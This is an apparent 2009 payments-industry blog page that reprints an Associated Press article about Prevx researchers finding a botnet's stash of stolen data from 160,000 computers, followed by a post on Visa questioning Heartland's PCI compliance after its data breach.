Metavante Technologies, Inc. (NYSE:MV) is the parent company of Metavante Corporation. Metavante Corporation delivers banking and payments technologies to approximately 8,000 financial services firms and businesses worldwide. Metavante products and services drive account processing for deposit, loan and trust systems, image-based and conventional check processing, electronic funds transfer, consumer healthcare payments, electronic presentment and payment, outsourcing, and payment network solutions including the NYCE Network, a leading ATM/PIN debit network. Metavante (www.metavante.com) is headquartered in Milwaukee.

1Link2Gov collects a convenience fee for PAY1040.com, businesstaxpayment.com and BML.PAY1040.com services.

Metavante, NYCE, Link2Gov and Pay1040.com are registered trademarks of Metavante Corporation, which is the principal subsidiary of Metavante Technologies, Inc.

All other trademarks are the property of their respective owners.





A Pain in the Bot!


To further illustrate how dangerous it is to use a personal computer as the conduit to financial transactions, I bring you the following article from the Associated Press, which was reprinted by "CapeCodeOnline."

And to illustrate even further...I created, well an illustration...depicting the dangers that lurk out there.  (on left)  Let's see...you've got your Zombies and Black Hats, your Snakes and Sniffers, Bots and Hackers and key-logging grifters...

What did Sanford use to tell Lizbeth? Oh yeah...Lizbit...here I come..."it's the big one!" Stay tuned. It'll happen and we'll cover it right here on the PIN Payments News Blog! Here's some stuff that ought to make you think twice before you enter your primary account number via a keyboard. Remember, Visa might cover your butt, but you still have to deal with the hassle involved, and that could take weeks, even months. It's a pain in the bot!


By JORDAN ROBERTSON
- THE ASSOCIATED PRESS

SAN FRANCISCO — Getting hacked is like having your computer turn traitor on you, spying on everything you do and shipping your secrets to identity thieves.  Victims don't see where their stolen data end up. But sometimes security researchers do, stumbling across stolen-data troves that offer a glimpse of what identity theft looks like from criminals' perspective.

Researchers from U.K.-based security firm Prevx found one such trove, a Web site used as a stash house for data from 160,000 infected computers before it was shut down this month.  The find offers a case study on just how much data criminals are stealing every day, from the utterly inconsequential to the alarmingly private.

It also shows the difficulty in shuttering criminals' ID-theft beachheads: The Web site Prevx found, which was operating on a server in Ukraine, was still online for nearly a month after security researchers alerted the Internet service provider and law-enforcement authorities. The site was sucking up data from 5,000 newly infected computers each day.

The victims in the Prevx find are mostly everyday people handing over their passwords for Facebook and banking sites, along with their love notes and other e-mails. But more dangerous personal information is there, too, including Social Security numbers and other account information from one bank's infected computer.

Caches of stolen data like these are hidden throughout the Internet, usually locked away inside password-protected Web sites or heavily fortified servers. Prevx's researchers were able to infiltrate this site because it was protected with poor encryption.  (Editor's Note:  Isn't that profound.  The hackers had poor encryption...)

In that sense, the find illustrates how even sloppy crooks can vacuum up enormous amounts of information through massive "botnets" — armies of infected computers formed by spreading a computer virus that orders compromised machines to phone home for further instructions, such as sending out spam or relaying passwords.

The botnet Prevx found was only harvesting data, though Prevx said it could have been upgraded to do other things.

Ordinary Internet sessions are logged in great detail. One Southern California 22-year-old could be seen registering a domain name with GoDaddy.com, changing his Yahoo e-mail password and ordering a meal online from Pizza Hut. His credit card number, birth date, telephone number, address and passwords are now all in criminals' hands, though it's unclear what, if anything, criminals have done with the information yet.

Some victims are gold mines for sensitive data.  An infected computer at a Georgia bank exposed customer details and credentials for the bank's wire-transfer system. Bank employees were checking e-mail, looking up BMWs and Infinitis and working with customers' accounts on the same infected machine.

Government computers were also hit, including one in Texas that coughed up Web site logins for one of the government's health care providers, and another in North Carolina that revealed access to an agency's human resources system.

"This is giving criminals the keys to the castle," said Prevx's director of malware research, Jacques Erasmus. "Once they're into this system, it might not seem at this point like it's the biggest data heist ever, but this is how they get into a network. This is their game — they do this every day."

In other words, criminals start small, then use their first point of attack as a way to jump onto more sensitive computers.
Researchers who discover these stolen-data caches then have to figure out what to do with them. Notifying victims is time-consuming and difficult, and researchers tend to focus on trying to get service providers to deactivate the servers before criminals get to the data on them.

Prevx said it alerted the site's Internet provider, the FBI and U.K. authorities about the breach it discovered. The company also talked to the affected bank, Doraville, Ga.-based Metro City Bank, a community bank whose Web site lists four locations, and Prevx said the bank has removed the infected computer.

One customer — Yoon-Kee Hong, a 22-year-old college student from Suwanee, Ga. — had signed up for an account with Metro City Bank just a month before learning about the breach. He said he had not been alerted by the bank that his Social Security number and other personal details were stolen.

After being told about the breach by The Associated Press, which picked his name from the files provided by Prevx, the student said he planned to cancel his account.
  "I cannot trust them any more," he said. "They're not doing what they're supposed to do. They didn't even notify me. It's like they're trying to hide it from their customers."

He later relented and decided to stay with the bank after he was offered a new account and promises of fraud alerts.
  The bank said in a statement that it is notifying customers and is investigating the breach, refusing to comment further. State officials in North Carolina and Texas didn't return calls on the breaches there. The FBI didn't return a call about the breaches.

Such finds are becoming more common as the barrier lowers for crooks to jump into the online identity-theft racket. Top-of-the-line viruses, also known as Trojans, can be had for under $1,000.
  Joe Stewart, a SecureWorks Inc. botnet expert who was not involved in Prevx's research, said that last year, he helped shut down a command-and-control server for a huge botnet that had infected more than 378,000 machines and had stolen more than 460,000 usernames and passwords.

There are countless other smaller botnets, set up by less sophisticated criminals who steal as much data as they can and simply pull up stakes, and do it all over again, once their operation has been detected.
  "The level of amateurness speaks to how widespread it is," Stewart said. "Literally anybody with a little bit of computer knowledge at all, if they have the criminal bent, can get access to one of these Trojans and get it out there and start stealing people's data."


Monday, April 6, 2009

House Questions Visa, Visa Questions Heartland, Heartland Has No Answers Yet

Heartland Data Breach: Visa Questions Processor's PCI Compliance

Visa Executive: "We've Never Seen Anyone Who Was Breached That Was PCI Compliant"


Despite the Heartland Payment Systems (HPY) data breach and other noted compromises, Visa staunchly supports the Payment Card Industry Data Security Standard (PCI DSS). 

This is the message from Adrian Phillips, Visa's Deputy Chief Enterprise Risk Officer, who in an exclusive interview hammers home the credit card company's support for the security standard - and suggests that, contrary to Heartland's own statements, the payment processor may not have been PCI compliant when it was breached sometime in 2008.

"We've never seen anyone who was breached that was PCI compliant," Phillips says without specifically naming - or excluding -- Heartland. "The breaches that we have seen have involved a key area of non-compliance."

Editor's Note: Meanwhile the House is blaming V/MC...see next post, and Heartland's stock (see chart below) continues its free fall. (Well, maybe not a "free" fall...it's costing shareholders some major kahunas. And they're so UN-HPY...they're suing...)


Interviewed during last week's Visa Security Summit in Washington, D.C., Phillips acknowledges Heartland and other recent breaches, but uses them as an opportunity to support the PCI standard. "Let's remember we've had some bad breaches, but if we had not had PCI DSS, it would have been much worse," Phillips says. "As of today, I am confident that PCI DSS works."

Phillips' comments come one week after news that Visa had removed Heartland Payment Systems from its certified PCI-DSS Compliant Service Providers list.

Continue Reading at Bank Info Security





